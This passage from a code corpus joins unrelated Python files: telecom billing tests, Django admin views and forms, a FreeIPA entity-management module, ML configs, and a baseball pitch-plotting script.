'cost_to_subscriber_per_min': 200,
'billable_unit': 1,
}
]
# Populate the config db with prices
process_prices(price_data, cls.config_db)
def test_on_receive_call(self):
"""We can get the subscriber price for an on-network received call."""
billable_seconds = 170
# Recall that the expected cost is rounded to the nearest value of 100.
expected_cost = 600
self.assertEqual(expected_cost,
get_call_cost(billable_seconds, 'on_network_receive'))
def test_on_receive_sms(self):
"""We can get the subscriber price for an on-network received SMS."""
expected_cost = 500
self.assertEqual(expected_cost, get_sms_cost('on_network_receive'))
def test_off_receive_call(self):
"""We can get the subscriber price for an off-network received call."""
billable_seconds = 700
expected_cost = 1200
self.assertEqual(
expected_cost,
get_call_cost(billable_seconds, 'off_network_receive'))
def test_off_receive_sms(self):
"""We can get the subscriber price for an off-network received SMS."""
expected_cost = 200
self.assertEqual(expected_cost, get_sms_cost('off_network_receive'))
def test_on_send_call(self):
"""We can get the subscriber price for an on-network sent call."""
billable_seconds = 190
expected_cost = 1000
self.assertEqual(expected_cost,
get_call_cost(billable_seconds, 'on_network_send'))
def test_on_send_sms(self):
"""We can get the subscriber price for an on-network sent SMS."""
expected_cost = 400
self.assertEqual(expected_cost, get_sms_cost('on_network_send'))
def test_call_to_chile(self):
"""We can get the cost of a call to Chile."""
billable_seconds = 830
expected_cost = 11000
number = ''.join(['56', '1235554567'])
actual_cost = get_call_cost(billable_seconds, 'off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_sms_to_chile(self):
"""We can get the price to a subscriber of an SMS sent to Chile."""
expected_cost = 1000
number = ''.join(['56', '1235554567'])
actual_cost = get_sms_cost('off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_call_to_ph(self):
""" We bill for calls to PH correctly. """
billable_seconds = 70
expected_cost = 900
number = ''.join(['63', '5551234567'])
actual_cost = get_call_cost(billable_seconds, 'off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_nonexistent_prefix(self):
"""If the prefix doesn't exist, it's free.
The prefix price key might not exist if, say, the billing tier data
has not yet been loaded.
"""
expected_cost = 0
number = ''.join(['9999', '1235554567'])
actual_cost = get_sms_cost('off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
class GetPrefixFromNumberTest(unittest.TestCase):
"""Testing core.billing.get_prefix_from_number."""
@classmethod
def setUpClass(cls):
# Setup the config db.
cls.config_db = config_database.ConfigDB()
cls.config_db['bts_secret'] = 'yup'
# Load up some pricing data into the config db. We use this data to
# determine what prefixes are available.
# 2015dec9(shasan): This is a legacy billing response, lacking billable
# units. This also tests we can handle that case.
price_data = [
{
'directionality': 'off_network_send',
'prefix': '789',
'country_name': 'Ocenaia',
'country_code': 'OC',
'cost_to_subscriber_per_sms': 300,
'cost_to_subscriber_per_min': 20,
}, {
'directionality': 'off_network_send',
'prefix': '78',
'country_name': 'Eurasia',
'country_code': 'EU',
'cost_to_subscriber_per_sms': 400,
'cost_to_subscriber_per_min': 10,
}, {
'directionality': 'off_network_send',
'prefix': '7',
'country_name': 'Eastasia',
'country_code': 'EA',
'cost_to_subscriber_per_sms': 500,
'cost_to_subscriber_per_min': 30,
}, {
'directionality': 'off_network_send',
'prefix': '3',
'country_name': 'London',
'country_code': 'LN',
'cost_to_subscriber_per_sms': 5000,
'cost_to_subscriber_per_min': 3000,
}
]
# Populate the config db with prices
process_prices(price_data, cls.config_db)
def test_get_one_digit_prefix(self):
"""We can get a one digit prefix."""
number = ''.join(['7', '1235557890'])
self.assertEqual('7', get_prefix_from_number(number))
def test_get_two_digit_prefix(self):
"""We can get a two digit prefix."""
number = ''.join(['78', '1235557890'])
self.assertEqual('78', get_prefix_from_number(number))
def test_get_three_digit_prefix(self):
"""We can get a three digit prefix."""
number = ''.join(['789', '1235557890'])
self.assertEqual('789', get_prefix_from_number(number))
def test_get_one_digit_uncommon_prefix(self):
"""We can get a one digit uncommon prefix."""
number = ''.join(['3', '1235557890'])
self.assertEqual('3', get_prefix_from_number(number))
class RoundCostToBillableUnit(unittest.TestCase):
"""Testing core.billing.round_to_billable_unit."""
def test_billable_unit_rounding_sans_free_seconds(self):
for i in range(100):
billsec = random.randint(1, 5000)
expected_cost = int(billsec * (TARIFF / 60.0))
print('%s seconds should cost %s' % (billsec, expected_cost))
self.assertEqual(expected_cost,
round_to_billable_unit(billsec, TARIFF))
def test_billable_unit_rounding_with_free_seconds(self):
for i in range(100):
billsec = random.randint(100, 5000)
free = random.randint(1, 100)
expected_cost = int((billsec - free) * (TARIFF / 60.0))
print('%s seconds with %s free should cost %s' %
(billsec, free, expected_cost))
self.assertEqual(expected_cost,
round_to_billable_unit(billsec, TARIFF, free))
def test_billable_unit_rounding_with_units(self):
"""Test the "rows" of this table: (billsec, expected_cost)."""
tests = [
# base case
(0, 60, 0, 30, 0),
# call too short
(5, 60, 0, 30, 30),
# changing the units
(5, 60, 0, 60, 60),
# call slightly too long
(61, 60, 0, 60, 120),
# weird non-uniform per minute
(61, 72, 0, 30, 108),
# including free seconds
(61, 60, 10, 60, 60)
]
for test in tests:
billsec = test[0]
rate = test[1]
free = test[2]
unit = test[3]
expected_cost = test[4]
actual_cost = round_to_billable_unit(billsec, rate, free, unit)
print('%s sec with %s free and a unit of %s sec '
'expected cost %s, actual cost %s' %
(billsec, free, unit, expected_cost, actual_cost))
self.assertEqual(expected_cost, actual_cost)
class RoundCostUpToNearest100(unittest.TestCase):
"""Testing core.billing.round_up_to_nearest_100."""
def test_round_negatives(self):
# test negatives
for i in [-10000, -100, -1]:
self.assertEqual(0, round_up_to_nearest_100(i))
def test_round_positives(self):
for i in range(0, 5000):
self.assertEqual(int(math.ceil(i / float(100))) * 100,
round_up_to_nearest_100(i))
| 2.265625 | 2 |
data_interrogator/admin/views.py | s-i-l-k-e/django-data-interrogator | 0 | 6863 | <reponame>s-i-l-k-e/django-data-interrogator
from django.contrib.auth.decorators import user_passes_test
from django.utils.decorators import method_decorator
from data_interrogator.admin.forms import AdminInvestigationForm, AdminPivotTableForm
from data_interrogator.interrogators import Allowable
from data_interrogator.views import InterrogationView, InterrogationAutocompleteUrls, PivotTableView, \
InterrogationAutoComplete
class AdminInterrogationRoom(InterrogationView):
template_name = 'admin/analytics/analytics.html'
form_class = AdminInvestigationForm
report_models = Allowable.ALL_MODELS
allowed = Allowable.ALL_APPS
excluded = []
@method_decorator(user_passes_test(lambda u: u.is_superuser))
def get(self, request):
return super(AdminInterrogationRoom,self).get(request)
class AdminInterrogationAutocompleteUrls(InterrogationAutocompleteUrls):
interrogator_view_class = AdminInterrogationRoom
interrogator_autocomplete_class = InterrogationAutoComplete
class AdminPivotTableView(PivotTableView):
form_class = AdminPivotTableForm
template_name = 'admin/analytics/pivot.html'
| 1.882813 | 2 |
configs/pspnet/pspnet_r18-d8_512x512_80k_loveda.py | heytanay/mmsegmentation | 11 | 6864 | <filename>configs/pspnet/pspnet_r18-d8_512x512_80k_loveda.py
_base_ = './pspnet_r50-d8_512x512_80k_loveda.py'
model = dict(
backbone=dict(
depth=18,
init_cfg=dict(
type='Pretrained', checkpoint='open-mmlab://resnet18_v1c')),
decode_head=dict(
in_channels=512,
channels=128,
),
auxiliary_head=dict(in_channels=256, channels=64))
| 1.210938 | 1 |
bba/objects.py | TheGenocides/BBA | 3 | 6865 | <reponame>TheGenocides/BBA
from typing import Dict, Any
class ResponseObject:
def __init__(self, data: Dict[str, Any]):
self.payload = data
for k, v in data.items():
setattr(self, k, v) | 2.34375 | 2 |
apps/greencheck/forms.py | BR0kEN-/admin-portal | 0 | 6866 | from django import forms
from django.forms import ModelForm
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError
from .choices import ActionChoice
from .choices import StatusApproval
from .models import GreencheckIp
from .models import GreencheckIpApprove
from .models import GreencheckASN, GreencheckASNapprove
User = get_user_model()
class ApprovalMixin:
ApprovalModel = None
def _save_approval(self):
"""
Save the approval request, be it an IP Range or an AS Network
from a
"""
if self.ApprovalModel is None:
raise NotImplementedError("Approval model missing")
model_name = self.ApprovalModel._meta.model_name
if not self.cleaned_data["is_staff"]:
hosting_provider = self.instance.hostingprovider
# changed here represents an
action = ActionChoice.update if self.changed else ActionChoice.new
status = StatusApproval.update if self.changed else StatusApproval.new
kwargs = {
"action": action,
"status": status,
"hostingprovider": hosting_provider,
}
if model_name == "greencheckasnapprove":
self.instance = GreencheckASNapprove(asn=self.instance.asn, **kwargs)
else:
self.instance = GreencheckIpApprove(
ip_end=self.instance.ip_end,
ip_start=self.instance.ip_start,
**kwargs
)
hosting_provider.mark_as_pending_review(self.instance)
def clean_is_staff(self):
try:
# when using this form `is_staff` should always be available
# or else something has gone wrong...
return self.data["is_staff"]
except KeyError:
raise ValidationError("Alert staff: a bug has occurred.")
class GreencheckAsnForm(ModelForm, ApprovalMixin):
ApprovalModel = GreencheckASNapprove
is_staff = forms.BooleanField(
label="user_is_staff", required=False, widget=forms.HiddenInput()
)
class Meta:
model = GreencheckASN
fields = (
"active",
"asn",
)
def save(self, commit=True):
self._save_approval()
return super().save(commit=True)
class GreencheckIpForm(ModelForm, ApprovalMixin):
"""This form is meant for admin
If a non staff user fills in the form it would return
an unsaved approval record instead of greencheckip record
"""
ApprovalModel = GreencheckIpApprove
is_staff = forms.BooleanField(
label="user_is_staff", required=False, widget=forms.HiddenInput()
)
class Meta:
model = GreencheckIp
fields = (
"active",
"ip_start",
"ip_end",
)
def save(self, commit=True):
"""
If a non-staff user creates an ip, instead of saving
the ip record directly, it will save an approval record.
Only when it has been approved the record will actually
be created.
So we return an approval instance instead of Greencheck instance
which in turn will get saved a bit later.
"""
self._save_approval()
return super().save(commit=commit)
class GreencheckAsnApprovalForm(ModelForm):
class Meta:
model = GreencheckASNapprove
fields = ("action", "asn", "status")
def save(self, commit=True):
instance = self.instance.greencheck_asn
if commit is True:
if instance:
instance.asn = self.instance.asn
instance.save()
else:
instance = GreencheckASN.objects.create(
active=True,
asn=self.instance.asn,
hostingprovider=self.instance.hostingprovider,
)
self.instance.greencheck_asn = instance
return super().save(commit=commit)
class GreecheckIpApprovalForm(ModelForm):
field_order = ("ip_start", "ip_end")
class Meta:
model = GreencheckIpApprove
fields = "__all__"
def save(self, commit=True):
ip_instance = self.instance.greencheck_ip
if commit is True:
if ip_instance:
ip_instance.ip_end = self.instance.ip_end
ip_instance.ip_end = self.instance.ip_start
ip_instance.save()
else:
ip_instance = GreencheckIp.objects.create(
active=True,
ip_end=self.instance.ip_end,
ip_start=self.instance.ip_start,
hostingprovider=self.instance.hostingprovider,
)
self.instance.greencheck_ip = ip_instance
return super().save(commit=commit)
| 2.203125 | 2 |
apps/utils/format/url_format.py | think-wang/osroom | 1 | 6867 | #!/usr/bin/env python
# -*-coding:utf-8-*-
from tld import get_tld
__author__ = "<NAME>"
def get_domain(url):
'''
获取url中的全域名
:param url:
:return:
'''
res = get_tld(url, as_object=True)
return "{}.{}".format(res.subdomain, res.tld) | 2.5625 | 3 |
ipamanager/entities.py | Tjev/freeipa-manager | 0 | 6868 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: BSD-3-Clause
# Copyright © 2017-2019, GoodData Corporation. All rights reserved.
"""
FreeIPA Manager - entity module
Object representations of the entities configured in FreeIPA.
"""
import os
import re
import voluptuous
import yaml
from abc import ABCMeta, abstractproperty
import schemas
from command import Command
from core import FreeIPAManagerCore
from errors import ConfigError, ManagerError, IntegrityError
class FreeIPAEntity(FreeIPAManagerCore):
"""
General FreeIPA entity (user, group etc.) representation.
Can only be used via subclasses, not directly.
"""
__metaclass__ = ABCMeta
entity_id_type = 'cn' # entity name identificator in FreeIPA
key_mapping = {} # attribute name mapping between local config and FreeIPA
ignored = [] # list of ignored entities for each entity type
allowed_members = []
def __init__(self, name, data, path=None):
"""
:param str name: entity name (user login, group name etc.)
:param dict data: dictionary of entity configuration values
:param str path: path to file the entity was parsed from;
if None, indicates creation of entity from FreeIPA
"""
super(FreeIPAEntity, self).__init__()
if not data: # may be None; we want to ensure dictionary
data = dict()
self.name = name
self.path = path
self.metaparams = data.pop('metaparams', dict())
if self.path: # created from local config
try:
self.validation_schema(data)
except voluptuous.Error as e:
raise ConfigError('Error validating %s: %s' % (name, e))
if not path.endswith('.yaml'): # created from template tool
path, name = os.path.split(self.path)
self.path = '%s.yaml' % os.path.join(
path, name.replace('-', '_'))
self.data_ipa = self._convert_to_ipa(data)
self.data_repo = data
else: # created from FreeIPA
self.data_ipa = data
self.data_repo = self._convert_to_repo(data)
def _convert_to_ipa(self, data):
"""
Convert entity data to IPA format.
:param dict data: entity data in repository format
:returns: dictionary of data in IPA format
:rtype: dict
"""
result = dict()
for key, value in data.iteritems():
new_key = self.key_mapping.get(key, key).lower()
if new_key == 'memberof':
self._check_memberof(value)
result[new_key] = value
elif isinstance(value, bool):
result[new_key] = value
elif isinstance(value, list):
result[new_key] = tuple(unicode(i) for i in value)
else:
result[new_key] = (unicode(value),)
return result
def _convert_to_repo(self, data):
"""
Convert entity data to repo format.
:param dict data: entity data in IPA format
:returns: dictionary of data in repository format
:rtype: dict
"""
result = dict()
for attr in self.managed_attributes_pull:
if attr.lower() in data:
key = attr
# find reverse (IPA -> repo) attribute name mapping
for k, v in self.key_mapping.iteritems():
if v == attr:
key = k
break
value = data[attr.lower()]
if isinstance(value, tuple):
if len(value) > 1:
result[key] = list(value)
else:
result[key] = value[0]
else:
result[key] = value
return result
def _check_memberof(self, member_of):
for entity_type in member_of:
try:
self.get_entity_class(entity_type)
except KeyError:
raise ConfigError(
'Cannot be a member of non-existent entity type %s'
% entity_type)
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order
to sync entity with its FreeIPA counterpart.
:param FreeIPAEntity remote_entity: remote entity
:returns: list of Command objects to execute
:rtype: list(Command)
"""
diff = dict()
for key in self.managed_attributes_push:
local_value = self.data_ipa.get(key.lower(), ())
if not remote_entity:
if local_value:
diff[key.lower()] = local_value
else:
remote_value = remote_entity.data_ipa.get(key.lower(), ())
if sorted(local_value) != sorted(remote_value):
diff[key.lower()] = local_value
if diff or not remote_entity: # create entity even without params
if remote_entity: # modify existing entity
command = '%s_mod' % self.entity_name
else: # add new entity
command = '%s_add' % self.entity_name
return [Command(command, diff, self.name, self.entity_id_type)]
return []
def update_repo_data(self, additional):
"""
Update repo-format data with additional attributes.
Used for adding membership attributes to data.
:param dict additional: dictionary to update entity data with
:rtype: None
"""
self.data_repo.update(additional or {})
def normalize(self):
"""
Re-structure entity's data in such a way that it can be stored
into the configuration file in a normalized format. This is used
when round-trip loading and saving a configuration.
"""
memberof = self.data_repo.pop('memberOf', None)
if memberof:
for target_type, target_list in memberof.iteritems():
memberof[target_type] = sorted(target_list)
self.data_repo['memberOf'] = memberof
def write_to_file(self):
if not self.path:
raise ManagerError(
'%s has no file path, nowhere to write.' % repr(self))
if self.metaparams:
self.data_repo.update({'metaparams': self.metaparams})
# don't write default attributes into file
for key in self.default_attributes:
self.data_repo.pop(key, None)
try:
with open(self.path, 'w') as target:
data = {self.name: self.data_repo or None}
yaml.dump(data, stream=target, Dumper=EntityDumper,
default_flow_style=False, explicit_start=True)
self.lg.debug('%s written to file', repr(self))
except (IOError, OSError, yaml.YAMLError) as e:
raise ConfigError(
'Cannot write %s to %s: %s' % (repr(self), self.path, e))
def delete_file(self):
if not self.path:
raise ManagerError(
'%s has no file path, cannot delete.' % repr(self))
try:
os.unlink(self.path)
self.lg.debug('%s config file deleted', repr(self))
except OSError as e:
raise ConfigError(
'Cannot delete %s at %s: %s' % (repr(self), self.path, e))
@staticmethod
def get_entity_class(name):
for entity_class in [
FreeIPAHBACRule, FreeIPAHBACService,
FreeIPAHBACServiceGroup, FreeIPAHostGroup, FreeIPAPermission,
FreeIPAPrivilege, FreeIPARole, FreeIPAService,
FreeIPASudoRule, FreeIPAUser, FreeIPAUserGroup]:
if entity_class.entity_name == name:
return entity_class
raise KeyError(name)
@abstractproperty
def validation_schema(self):
"""
:returns: entity validation schema
:rtype: voluptuous.Schema
"""
@abstractproperty
def managed_attributes_push(self):
"""
Return a list of properties that are managed for given entity type
when pushing configuration from local repo to FreeIPA.
NOTE: the list should NOT include attributes that are managed via
separate commands, like memberOf/memberHost/memberUser or ipasudoopt.
:returns: list of entity's managed attributes
:rtype: list(str)
"""
@property
def managed_attributes_pull(self):
"""
Return a list of properties that are managed for given entity type.
when pulling configuration from FreeIPA to local repository.
:returns: list of entity's managed attributes
:rtype: list(str)
"""
return self.managed_attributes_push
@property
def default_attributes(self):
"""
Return a list of default attributes for each entity of the given type.
These attributes will not be written into the YAML file when pulling.
:returns: list of entity's attributes that have single default value
:rtype: list(str)
"""
return []
def __repr__(self):
return '%s %s' % (self.entity_name, self.name)
def __str__(self):
return self.name
def __eq__(self, other):
return type(self) is type(other) and self.name == other.name
def __ne__(self, other):
return not (self == other)
def __gt__(self, other):
return self.name > other.name
def __lt__(self, other):
return self.name < other.name
class FreeIPAGroup(FreeIPAEntity):
"""Abstract representation a FreeIPA group entity (host/user group)."""
managed_attributes_push = ['description']
@abstractproperty
def allowed_members(self):
"""
:returns: list of entity types that can be members of this entity
:rtype: list(FreeIPAEntity)
"""
class FreeIPAHostGroup(FreeIPAGroup):
"""Representation of a FreeIPA host group entity."""
entity_name = 'hostgroup'
allowed_members = ['hostgroup']
validation_schema = voluptuous.Schema(schemas.schema_hostgroups)
class FreeIPAUserGroup(FreeIPAGroup):
"""Representation of a FreeIPA user group entity."""
entity_name = 'group'
managed_attributes_pull = ['description', 'posix']
allowed_members = ['user', 'group']
validation_schema = voluptuous.Schema(schemas.schema_usergroups)
def __init__(self, name, data, path=None):
"""
:param str name: entity name (user login, group name etc.)
:param dict data: dictionary of entity configuration values
:param str path: path to file the entity was parsed from;
if None, indicates creation of entity from FreeIPA
"""
if not path: # entity created from FreeIPA, not from config
data['posix'] = u'posixgroup' in data.get(u'objectclass', [])
super(FreeIPAUserGroup, self).__init__(name, data, path)
self.posix = self.data_repo.get('posix', True)
def can_contain_users(self, pattern):
"""
Check whether the group can contain users directly.
If the pattern is None, no restrictions are applied.
:param str pattern: regex to check name by (not enforced if empty)
"""
return not pattern or re.match(pattern, self.name)
def cannot_contain_users(self, pattern):
"""
Check whether the group can not contain users directly.
Used for determining if the group can be a member of a sudo/HBAC rule.
If the pattern is None, no restrictions are applied.
:param str pattern: regex to check name by (not enforced if empty)
"""
return not pattern or not re.match(pattern, self.name)
def _process_posix_setting(self, remote_entity):
posix_diff = dict()
description = None
if remote_entity:
if self.posix and not remote_entity.posix:
posix_diff = {u'posix': True}
description = 'group_mod %s (make POSIX)' % self.name
elif not self.posix and remote_entity.posix:
posix_diff = {'setattr': (u'gidnumber=',),
'delattr': (u'objectclass=posixgroup',)}
description = 'group_mod %s (make non-POSIX)' % self.name
elif not self.posix: # creation of new non-POSIX group
posix_diff = {u'nonposix': True}
return (posix_diff, description)
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation with POSIX/non-POSIX setting.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
commands = super(FreeIPAUserGroup, self).create_commands(remote_entity)
posix_diff, description = self._process_posix_setting(remote_entity)
if posix_diff:
if not commands: # no diff but POSIX setting, new command needed
cmd = Command('group_mod', posix_diff,
self.name, self.entity_id_type)
cmd.description = description
return [cmd]
else: # update POSIX setting as part of existing command
commands[0].update(posix_diff)
return commands
class FreeIPAUser(FreeIPAEntity):
"""Representation of a FreeIPA user entity."""
entity_name = 'user'
entity_id_type = 'uid'
managed_attributes_push = ['givenName', 'sn', 'initials', 'mail',
'ou', 'manager', 'carLicense', 'title']
key_mapping = {
'emailAddress': 'mail',
'firstName': 'givenName',
'lastName': 'sn',
'organizationUnit': 'ou',
'githubLogin': 'carLicense'
}
validation_schema = voluptuous.Schema(schemas.schema_users)
class FreeIPARule(FreeIPAEntity):
"""Abstract class covering HBAC and sudo rules."""
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation
to account for adding/removing rule members.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
result = super(FreeIPARule, self).create_commands(remote_entity)
result.extend(self._process_rule_membership(remote_entity))
return result
def _process_rule_membership(self, remote_entity):
"""
Prepare a command for a hbac/sudo rule membership update.
If the rule previously had any members, these are removed
as a rule can only have one usergroup and one hostgroup as members.
:param FreeIPArule remote_entity: remote entity data (may be None)
"""
commands = []
for key, member_type, cmd_key in (
('memberhost', 'hostgroup', 'host'),
('memberuser', 'group', 'user'),
('memberservice', 'hbacsvc', 'service')):
local_members = set(self.data_ipa.get(key, []))
if remote_entity:
search_key = '%s_%s' % (key, member_type)
remote_members = set(
remote_entity.data_ipa.get(search_key, []))
else:
remote_members = set()
command = '%s_add_%s' % (self.entity_name, cmd_key)
for member in local_members - remote_members:
diff = {member_type: member}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
command = '%s_remove_%s' % (self.entity_name, cmd_key)
for member in remote_members - local_members:
diff = {member_type: member}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
return commands
class FreeIPAHBACRule(FreeIPARule):
"""Representation of a FreeIPA HBAC (host-based access control) rule."""
entity_name = 'hbacrule'
default_attributes = ['serviceCategory']
managed_attributes_push = ['description', 'serviceCategory']
validation_schema = voluptuous.Schema(schemas.schema_hbac)
def __init__(self, name, data, path=None):
"""
Create a HBAC rule instance.
This override is needed to set the servicecat parameter.
"""
if path: # only edit local entities
if not data: # may be None; we want to ensure dictionary
data = dict()
if 'memberService' not in data:
data.update({'serviceCategory': 'all'})
elif 'serviceCategory' in data:
raise IntegrityError(
'%s cannot contain both memberService and serviceCategory'
% name)
super(FreeIPAHBACRule, self).__init__(name, data, path)
class FreeIPASudoRule(FreeIPARule):
"""Representation of a FreeIPA sudo rule."""
entity_name = 'sudorule'
default_attributes = [
'cmdCategory', 'options', 'runAsGroupCategory', 'runAsUserCategory']
managed_attributes_push = [
'cmdCategory', 'description',
'ipaSudoRunAsGroupCategory', 'ipaSudoRunAsUserCategory']
managed_attributes_pull = managed_attributes_push + ['ipaSudoOpt']
key_mapping = {
'options': 'ipaSudoOpt',
'runAsGroupCategory': 'ipaSudoRunAsGroupCategory',
'runAsUserCategory': 'ipaSudoRunAsUserCategory'
}
validation_schema = voluptuous.Schema(schemas.schema_sudo)
def __init__(self, name, data, path=None):
"""
Create a sudorule instance.
This override is needed to set the options & runAs params.
"""
if path: # only edit local entities
if not data: # may be None; we want to ensure dictionary
data = dict()
data.update({'options': ['!authenticate', '!requiretty'],
'cmdCategory': 'all',
'runAsUserCategory': 'all',
'runAsGroupCategory': 'all'})
super(FreeIPASudoRule, self).__init__(name, data, path)
def _convert_to_repo(self, data):
result = super(FreeIPASudoRule, self)._convert_to_repo(data)
if isinstance(result.get('options'), unicode):
result['options'] = [result['options']]
return result
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation with sudorule option update.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
result = super(FreeIPASudoRule, self).create_commands(remote_entity)
result.extend(self._parse_sudo_options(remote_entity))
return result
def _parse_sudo_options(self, remote_entity):
"""
Prepare commands for sudo rule options update. This includes
deletion of old options that are no longer in configuration
as well as addition of new options.
:param dict remote_entity: remote entity data (can be None)
:returns: list of sudorule option update commands to execute
:rtype: list(Command)
"""
commands = []
local_options = set(self.data_repo.get('options', []))
if remote_entity:
remote_options = set(remote_entity.data_ipa.get('ipasudoopt', []))
else:
remote_options = set()
command = 'sudorule_add_option'
for opt in local_options - remote_options:
diff = {'ipasudoopt': [opt]}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
command = 'sudorule_remove_option'
for opt in remote_options - local_options:
diff = {'ipasudoopt': [opt]}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
return commands
class FreeIPAHBACService(FreeIPAEntity):
"""Entity to hold the info about FreeIPA HBACServices"""
entity_name = 'hbacsvc'
managed_attributes_push = ['description']
managed_attributes_pull = managed_attributes_push
validation_schema = voluptuous.Schema(schemas.schema_hbacservices)
class FreeIPAHBACServiceGroup(FreeIPAEntity):
"""Entity to hold the info about FreeIPA HBACServiceGroups"""
entity_name = 'hbacsvcgroup'
managed_attributes_push = ['description']
managed_attributes_pull = managed_attributes_push
allowed_members = ['hbacsvc']
validation_schema = voluptuous.Schema(schemas.schema_hbacsvcgroups)
class FreeIPARole(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Roles"""
entity_name = 'role'
managed_attributes_pull = ['description']
managed_attributes_push = managed_attributes_pull
allowed_members = ['user', 'group', 'service', 'hostgroup']
validation_schema = voluptuous.Schema(schemas.schema_roles)
class FreeIPAPrivilege(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Privilege"""
entity_name = 'privilege'
managed_attributes_pull = ['description']
managed_attributes_push = managed_attributes_pull
allowed_members = ['role']
validation_schema = voluptuous.Schema(schemas.schema_privileges)
class FreeIPAPermission(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Permission"""
entity_name = 'permission'
managed_attributes_pull = ['description', 'subtree', 'attrs',
'ipapermlocation', 'ipapermright',
'ipapermdefaultattr']
managed_attributes_push = managed_attributes_pull
key_mapping = {
'grantedRights': 'ipapermright',
'attributes': 'attrs',
'location': 'ipapermlocation',
'defaultAttr': 'ipapermdefaultattr'
}
allowed_members = ['privilege']
validation_schema = voluptuous.Schema(schemas.schema_permissions)
class FreeIPAService(FreeIPAEntity):
"""
Entity to hold the info about FreeIPA Services
PUSH NOT SUPPORTED yet
"""
entity_name = 'service'
entity_id_type = 'krbcanonicalname'
managed_attributes_push = [] # Empty because we don't support push
managed_attributes_pull = ['managedby_host', 'description']
key_mapping = {
'managedBy': 'managedby_host',
}
validation_schema = voluptuous.Schema(schemas.schema_services)
def write_to_file(self):
"""
Converts the file name format from xyz/hostname.int.na.intgdc.com
to xyz-hostname_int_na_intgdc_com.yaml
"""
path, file_name = os.path.split(self.path)
service_name, _ = file_name.split('@')
self.path = ('%s-%s.yaml' % (path, service_name.replace('.', '_')))
super(FreeIPAService, self).write_to_file()
class EntityDumper(yaml.SafeDumper):
"""YAML dumper subclass used to fix under-indent of lists when dumping."""
def __init__(self, *args, **kwargs):
super(EntityDumper, self).__init__(*args, **kwargs)
self.add_representer(type(None), self._none_representer())
def increase_indent(self, flow=False, indentless=False):
return super(EntityDumper, self).increase_indent(flow, False)
def _none_representer(self):
"""
Enable correct representation of empty values in config
by representing None as empty string instead of 'null'.
"""
def representer(dumper, value):
return dumper.represent_scalar(u'tag:yaml.org,2002:null', '')
return representer
| 2.015625 | 2 |
test/test_catalog_manager.py | weknowtraining/athena-glue-service-logs | 133 | 6869 | # pylint: skip-file
from athena_glue_service_logs.catalog_manager import BaseCatalogManager
def test_class_init(mocker):
mocker.patch.multiple(BaseCatalogManager, __abstractmethods__=set())
base_catalog = BaseCatalogManager('us-west-2', 'dbname', 'tablename', 's3://somewhere')
assert base_catalog.database_name == 'dbname'
assert base_catalog.s3_location == 's3://somewhere'
assert base_catalog.table_name == 'tablename'
def test_init_with_partitions(mocker):
mocker.patch.multiple(BaseCatalogManager, __abstractmethods__=set())
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.does_database_exist', return_value=True)
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_database')
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_table')
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_partitions')
base_catalog = BaseCatalogManager('us-west-2', 'dbname', 'tablename', 's3://somewhere')
base_catalog.initialize_with_partitions(['a', 'b', 'c'])
assert BaseCatalogManager.create_database.call_count == 0
BaseCatalogManager.create_table.assert_called_once()
BaseCatalogManager.create_partitions.assert_called_once_with(partition_list=['a', 'b', 'c'])
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.does_database_exist', return_value=False)
base_catalog.initialize_with_partitions(['a', 'b', 'c'])
assert BaseCatalogManager.create_database.call_count == 1
| 1.945313 | 2 |
unsorted/pythonsnippets_0013.py | fiddlerwoaroof/sandbox | 0 | 6870 | from twisted.internet import reactor
reactor.listenTCP(8789, factory)
reactor.run() | 1.398438 | 1 |
__main__.py | SHUcream00/MLBPitchVisual | 0 | 6871 | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
def visualize(dataframe, balltype):
df = dataframe
#Filter by balltype
res = df[df["pitch_type"] == balltype]
#Group by results
groups = res.groupby("description")
for name, group in groups:
if name == "miss":
plt.plot(group["plate_x"], group["plate_z"], marker="o", linestyle="", color="none", ms = 3, mec="#9A9A9A", label=name)
else:
plt.plot(group["plate_x"], group["plate_z"], marker="o", linestyle="", color="none", ms = 3, mec="#03A77F", label=name)
#Fixing the viewpoint of the plot
axes = plt.gca()
axes.set_xlim([-2.50,2.50])
axes.set_ylim([0.00,5.00])
#Setting strike zone
sz_top_avg = res["sz_top"].mean()
sz_bottom_avg = res["sz_bot"].mean()
sz_left = -0.85
sz_right = 0.85
#Drawing strike zone
plt.plot((sz_left, sz_right), (sz_top_avg, sz_top_avg), 'k-')
plt.plot((sz_left, sz_right), (sz_bottom_avg, sz_bottom_avg), 'k-')
plt.plot((sz_left, sz_left), (sz_top_avg, sz_bottom_avg), 'k-')
plt.plot((sz_right, sz_right), (sz_top_avg, sz_bottom_avg), 'k-')
#Setting labels
plt.xlabel("Horizontal Location")
plt.ylabel("Vertical Location")
plt.title(f"{player_name} 2018\n {ballname_dict.get(balltype, balltype)}")
plt.legend()
plt.show()
#Setting up Name and CSV location
player_name = "Put player name"
file_src = "Put target csv"
raw = pd.read_csv(file_src)
df = pd.DataFrame(raw)
#For filtering cases
